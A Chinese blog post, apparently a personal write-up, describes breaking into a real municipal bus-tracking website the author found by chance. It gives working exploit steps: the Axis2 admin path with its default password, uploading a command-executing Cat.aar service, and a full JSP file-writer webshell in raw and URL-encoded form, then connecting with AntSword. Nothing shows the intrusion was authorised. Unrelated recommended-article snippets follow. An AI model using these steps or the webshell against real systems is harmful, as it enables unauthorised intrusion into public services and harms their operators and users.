考驾照 顺便学习网络安全练习靶机!

最新推荐文章于 2024-08-21 22:55:06 发布
最新推荐文章于 2024-08-21 22:55:06 发布
阅读量241 收藏
点赞数
分类专栏: 后端 文章标签: 网络安全 java php django 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42145856/article/details/114141518
版权

在这里插入图片描述
在这里插入图片描述

仅供学习! 切勿违法

前言:今天是我练习科目3的第三天,又是早上起床早早的去往驾校的路上,晚上回家是要做公交车回家的,
于是打开微信找到我们市的公众号,看下回家的公交车到哪里了…结果有了意图

如图:

在这里插入图片描述

今天看到了公交车查询的网站,于是进行一下渗透测试…

前言:今天是我练习科目3的第三天,又是早上起床早早的去往驾校的路上,晚上回家是要做公交车回家的,
于是打开微信找到我们市的公众号,看下回家的公交车到哪里了…结果有了意图

如图:

今天看到了公交车查询的网站,于是进行一下渗透测试…

jsp的网站比较老了,结果扫描目录发现,,找到了Axis2的后台地址:

url:http://www.xxxx.com/axis2/axis2-admin/

直接尝试默认账号 admin 密码 axis2 无意结果登陆进去了…

果然不堪一击…

实战当中可以读取/conf/axis2.xml 内容看一下账号密码
在这里插入图片描述

点击左侧Upload service 浏览上传一个webshell,axis2貌似只支持.arr的文件

我们找到,Cat.arr的这样一个文件(百度就有)

这个文件类似于中马也可以可以执行cmd命令也可以写入文件进去…

我们执行看一下

http://www.xxx.com/axis2/services/Cat/exec?cmd=whoami

在这里插入图片描述
权限还是很高的,接下来我们要做的就是获取classpath路径

http://www.xxx.com/axis2/services/Cat/getClassPathResponse

可以看到:/D:/tomcat8/webapps/axis2 网站路径 我们写文件的时候要用到的

接下来就是写文件,getshell

搞定jsp的的一句话:<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

需要转换为url编码,可以百度编码转换

编码转换之后看下面:

http://www.xxxx.com/axis2/services/Cat/writeStringToFile?data=%3c%25%20%69%66%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%21%3d%6e%75%6c%6c%29%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%4f%75%74%70%75%74%53%74%72%65%61%6d%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%2f%22%29%2b%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%29%29%2e%77%72%69%74%65%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%22%29%2e%67%65%74%42%79%74%65%73%28%29%29%3b%20%25%3e&file=/D:/tomcat8/webapps//axis2/1.jsp&encoding=utf-8&append=false

这样就写文件进去了,目录在 http://www.xxx.com/axis2/1.jsp

ok,接下来我们本地创建一个一个html,我们用本地jsp客户端连接

JSP一句话木马客户端
专用JSP木马连接器
服务端地址

你提交的代码
保存成的文件名:

在这里插入图片描述

  • 写入我们jsp一句话,蚁剑连接…
    在这里插入图片描述

OK,到这里不继续了,交洞跑路。

总结:

又是没什么可总结的,细节细节,多尝试,新手一枚,大佬多多指教,希望我的9号科目三顺利通过!!!

软测小刘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C# winform中无标题栏窗口如何实现鼠标拖动?
汽车电子软件领域知识分享
08-23 1197
在C# winform中,可以通过重写窗体的鼠标事件来实现无标题栏窗体的拖动。
IDEA下的node项目配置npm install出现无法安装解决方案
zokingo的博客
10-06 6995
因为windows安装的时候是0.x.x的版本,需要到官网下载最新的node进行安装,顺带它还把npm也更新了。 设置环境变量,参考这个教程node win安装配置,需要创建两个文件夹,然后修改系统环境变量和用户环境变量。 IDEA控制台每次敲命令很麻烦,自定义启动任务。不好截图,右上角edit configuration,打开default下拉找到node.js任务 apply之后,面板会出现绿色
Qt-无标题窗口
学而思
05-21 7468
        今天学习了下无标题窗口,于是来记录下我的学习过程首先建立一个Qt Widgets Application继承QWidget类创建完后直接运行就得到了如下效果那么,既然是无标题窗口就要去掉窗口栏啊,于是加上setWindowFlags(Qt::FramelessWindowHint | Qt::WindowMinimizeButtonHint);去掉标题栏,但是这样整个窗口就不能移动...
C#中实现无标题栏窗体拖动的代码
热门推荐
百锦再的博客
01-18 1万+
事件来实现拖动功能。当鼠标按下时,我们标记鼠标正在拖动,并保存当前坐标。在鼠标移动时,如果鼠标正在拖动,我们更新窗体的位置,使其跟随鼠标移动。当鼠标释放时,我们取消拖动标记。请注意,在窗体上添加了对应事件处理程序的窗体控件属性应该设置为对应的事件处理程序方法。在窗体设计视图,选择属性窗格,在事件选项卡中为。在C#中实现无标题栏窗体拖动的代码可以通过处理鼠标事件来实现。这样,当你在运行窗体时,你就可以通过鼠标拖动窗体来改变其位置。事件分别选择对应的处理程序方法。在这个示例代码中,我们通过处理。
C# 移动无标题栏无边框窗体的3种方法
SabreWulf
03-13 2268
目录 第一种:手工移动 第二种:调用系统API 1.引入下面代码 前提需要引入命名空间using System.Runtime.InteropServices 2.增加鼠标按下事件发送消息,让系统误以为按下是标题栏 第三种,重写 WndProc 第一种:手工移动 直接通过修改窗体位置从而达到移动窗体的效果 //定义一个位置信息Point用于存储鼠标位置 private Point mPoint; /// <summary>
Qt实现改变无标题栏窗体大小及移动窗体
danshiming的博客
11-10 3360
Qt实现鼠标左键拖动无标题栏窗体右下角改变窗体大小及移动窗体
Chrome显示无标题错误代码STATUS_INVALID_IMAGE_HASH
precy_wm的博客
01-03 1483
Chrome显示无标题错误代码STATUS_INVALID_IMAGE_HASH
Chrome 无标题 哭脸 已崩溃
wkj52719的博客
05-24 4525
谷歌浏览器chrome突然打开后任何页面均显示为无标题,哭脸。鼠标选中sheet页面时,提示已崩溃。 无法打开设置、开发工具箱 经过检查,是chrome的Userdata数据出错,导致页面加载无法正常展示页面。 修复办法: 打开文件夹C:\Users\{privateUserId}\AppData\Local\Google\Chrome,删除User data文件夹,如果需要备份UserData,请备份User Data到其他地方。 ...
WIN32无标题栏窗口移动方法种种
ZDT_zdh的博客
11-02 2063
WIN32无标题栏窗口移动方法种种 转载来源:http://blog.csdn.net/fuyun_cloud/article/details/8008197     首先,看看在正常情况下系统是怎样来移动程序窗口的。当使用者在程序窗口标题栏区域(非工作区)内,按下鼠标左键时将会发生下列事情:  ◆ 系统向该窗口过程函数发送WM_NCLBUTTONDOWN消息。  ◆ WM_NC...
Qt无标题窗口
05-21
在本文中,我们将深入探讨如何使用Qt框架创建一个无标题窗口,这在界面设计和自定义标题栏美化中非常有用。我们将关注`framelesswidget.cpp`、`main.cpp`、`framelesswidget.h`等核心文件,理解它们在实现无标题窗口...
VC去掉'无标题'字样的方法.zip
11-21
在使用Visual C++进行编程时,我们经常会在创建新的窗口或者对话框时默认看到标题栏显示为“无标题”。这可能会对用户界面的美观性和专业性造成一定的影响。本资料包提供了一种方法来帮助开发者去掉这个“无标题”...
visual c++取掉对话框窗口的 -无标题 字样的方法
08-04
在Visual C++编程环境中,创建窗口应用程序时,默认情况下,窗口标题栏可能会显示“-无标题”字样,这通常是由于没有正确设置窗口类或没有自定义窗口标题所导致的。要解决这个问题,我们需要深入理解Windows API中的...
c#实现无标题栏窗口的拖动
09-05
本篇文章将详细讲解如何在C#中实现这种无标题栏窗口的拖动以及其他基本操作。 首先,为了实现无标题栏窗口的拖动,我们需要处理窗体的鼠标事件。窗体的`FormBorderStyle`属性应设置为`None`,这会去除窗体的边框和...
delphi 无标题调整大小
11-26
在Delphi编程环境中,"无标题调整大小"通常是指创建没有标准标题栏的窗口,并允许用户通过拖动边界来调整其大小。这种设计通常用于自定义界面或创建无边框的对话框。以下是对这个主题的详细解释: 一、创建无标题...
Maven开发Spring Boot 项目
ch_s_t的专栏
08-21 489
在Spring体系中,较早实现MVC框架的有Struts-Spring-Hibernate(SSH)框架和Spring-Spring MVC+MyBatis(SSM)框架,为了进一步在保证功能的前提下优化项目的开发流程,Pivotal公司于2014年4 月发布了Spring Boot 的第一个版本,当下该框架已经升级到了3.2.1版本。Spring Boot框架是一 套开源的后台开发框架, 继承了Spring MVC框架的前辈SSM框架的优秀特性,通过注解大幅减少程序员写配置的工作量。
使用maven快速生成打包文件
Angushine的专栏
08-21 257
最近在部署基于SpringBoot开发的项目时,由于微服务较多,本地工程编译后只得出一个JAR包,部署起来实在不方便,因此总想着怎么偷偷懒,执行一次命令编译出整个部署的文件。先说结果,最后期望打包的目录如下: 各个目录或文件说明如下: bin:包含程序启动和停止的两个脚本,后台运行脚本 cert:程序运行过程中使用的一些证书 config:各种配置文件 logs:运行日志 kafka-roma.jar:主程序 run.bat:windows下运行脚本 run.sh:linux下运行脚本,非后台脚本 先上
Maven-08.依赖管理-生命周期
程小白的博客
08-21 620
接着编写测试代码 双击maven中的test执行
Maven的简单使用
最新发布
weixin_53475254的博客
08-21 414
介绍maven的使用
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。 2. 使用自定义的主题,可以在样式表中添加以下代码: <style name="AppTheme" parent="Theme.AppCompat.NoActionBar"> <!-- ...其他样式... --> </style> 这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。 3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。 以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值